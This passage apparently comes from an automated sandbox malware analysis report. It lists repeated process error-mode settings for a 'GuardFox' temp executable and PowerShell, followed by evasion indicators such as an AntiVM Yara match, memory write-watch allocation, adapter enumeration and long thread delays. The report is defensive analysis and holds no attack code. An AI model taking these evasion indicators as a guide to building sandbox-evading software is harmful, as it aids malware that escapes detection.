            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8884, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeMemory allocated: 2670000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeMemory allocated: 1A8E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,10_2_02DCE9B6
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6340Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3352Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7272Jump to behavior
